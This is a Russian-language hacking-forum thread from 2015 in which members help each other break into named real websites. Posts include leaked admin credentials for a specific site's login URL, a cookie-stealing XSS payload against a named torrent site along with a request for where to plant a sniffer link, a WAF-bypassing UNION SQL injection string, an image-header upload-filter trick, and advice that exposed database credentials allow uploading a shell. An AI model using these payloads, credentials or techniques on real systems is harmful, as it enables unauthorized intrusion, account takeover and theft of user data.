ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #451  
Старый 11.08.2015, 21:11
Muracha
Участник форума
Регистрация: 30.07.2011
Сообщений: 151
С нами: 7782806

Репутация: 0
По умолчанию

Он фильтрует не содержимое файла, без разницы что там, eval или echo.

Он фильтрует заголовки

код типа пропустил но выполнить не удалось

Код:
‰PNG
   
IHDR       ђwSЮ       pHYs     љњ   tIMEЯ
’ьdп   IDATЧcшяя? ююЬМYз    IEND®B`‚
 
Ответить с цитированием

  #452  
Старый 11.08.2015, 21:14
blackhead
Новичок
Регистрация: 11.08.2015
Сообщений: 28
С нами: 5661686

Репутация: 0
По умолчанию

Цитата:
Сообщение от OxoTnik  
Спасибо, но как вы нашли? Софт или сервис? Перепробовал много, но не нашел((

PS

Да, и еще если не получится раcшифровать пароль, то есть еще какие нибудь варианты?
 
Ответить с цитированием

  #453  
Старый 11.08.2015, 23:00
OxoTnik
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
С нами: 7854806

Репутация: 173


По умолчанию

софт со своим словарём.

Цитата:
Сообщение от blackhead  

Спасибо, но как вы нашли? Софт или сервис? Перепробовал много, но не нашел((
PS
Да, и еще если не получится раcшифровать пароль, то есть еще какие нибудь варианты?
 
Ответить с цитированием

  #454  
Старый 12.08.2015, 15:40
t0ma5
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами: 7502006

Репутация: 90


По умолчанию

Цитата:
Сообщение от blackhead  

Спасибо, но как вы нашли? Софт или сервис? Перепробовал много, но не нашел((
PS
Да, и еще если не получится раcшифровать пароль, то есть еще какие нибудь варианты?
http://content.oscar-k.dk/index.php?signIn=1

seba:12345
 
Ответить с цитированием

  #455  
Старый 12.08.2015, 17:25
Chudak
Новичок
Регистрация: 07.08.2015
Сообщений: 2
С нами: 5667446

Репутация: 0
По умолчанию

Цитата:
Сообщение от XAMEHA  

Вы в слепую крутите? У вас вывод есть. Еще есть вывод ошибок. WAF фильтрует information_schema, в настоящее время обойти это не возможно. Брутите таблицы
Спасибо!!!!Вывод ошибок через extractvalue я видел, а на прямой вывод что-то не получается составить запрос. Может подскажешь?!!!
 
Ответить с цитированием

  #456  
Старый 12.08.2015, 22:08
blackhead
Новичок
Регистрация: 11.08.2015
Сообщений: 28
С нами: 5661686

Репутация: 0
По умолчанию

Цитата:
Сообщение от t0ma5  
Спасибо, но хотелось бы знать что откуда. Если не трудно хотя-бы вкратце - как найти админку и откуда seba:12345 (в базе я нашел только юзера oscar).
 
Ответить с цитированием

  #457  
Старый 13.08.2015, 02:08
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
С нами: 5710646

Репутация: 24


По умолчанию

нашол такую хсс при нажатие в правом углу на закрытие появляется алерт

http://www.torrentsmd.com/smilies_popup.php?text=3&container='+alert(+docume nt.cookie)+'&lang=ro

где типерь запихнуть сылку сниффера помоги пожалуста

http://hacker-lab.com/sniffer/images/251095_3.jpg
 
Ответить с цитированием

  #458  
Старый 13.08.2015, 02:23
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами: 8417113

Репутация: 0
По умолчанию

Цитата:
Сообщение от Chudak  

Спасибо!!!!Вывод ошибок через extractvalue я видел, а на прямой вывод что-то не получается составить запрос. Может подскажешь?!!!
Код:
place=1')sub2 WHERE 1.0Union/*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,version(),13,14,15,16,17,18,19,20--+
Инъекция в table_references.
 
Ответить с цитированием

  #459  
Старый 13.08.2015, 03:16
Sensoft
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
С нами: 5745206

Репутация: 1
По умолчанию

ребят вот нашёл сайт, и перейдя по правельной ссылки мне выдаёт файл config и там настройки подключения к бд

DATABASE HOSTNAME - есть

DATABASE USERNAME - есть

DATABASE PASSWORD - есть

DATABASE NAME - есть

DATABASE PORT - есть

И ещё асякие конфигурации там вроде даже есть привязка по IP адресам

Так вот в чём вопрос это считается серьёзной уязвимостью ? (если да то на сколько она серьёзная)
 
Ответить с цитированием

  #460  
Старый 13.08.2015, 12:27
OxoTnik
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
С нами: 7854806

Репутация: 173


По умолчанию

Цитата:
Сообщение от Sensoft  

ребят вот нашёл сайт, и перейдя по правельной ссылки мне выдаёт файл config и там настройки подключения к бд
DATABASE HOSTNAME - есть
DATABASE USERNAME - есть
DATABASE PASSWORD - есть
DATABASE NAME - есть
DATABASE PORT - есть
И ещё асякие конфигурации там вроде даже есть привязка по IP адресам
Так вот в чём вопрос это считается серьёзной уязвимостью ? (если да то на сколько она серьёзная)
Серьёзная уязвимость, можно управлять БД, залить шелл, в общем что угодно сделать с сайтом.
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.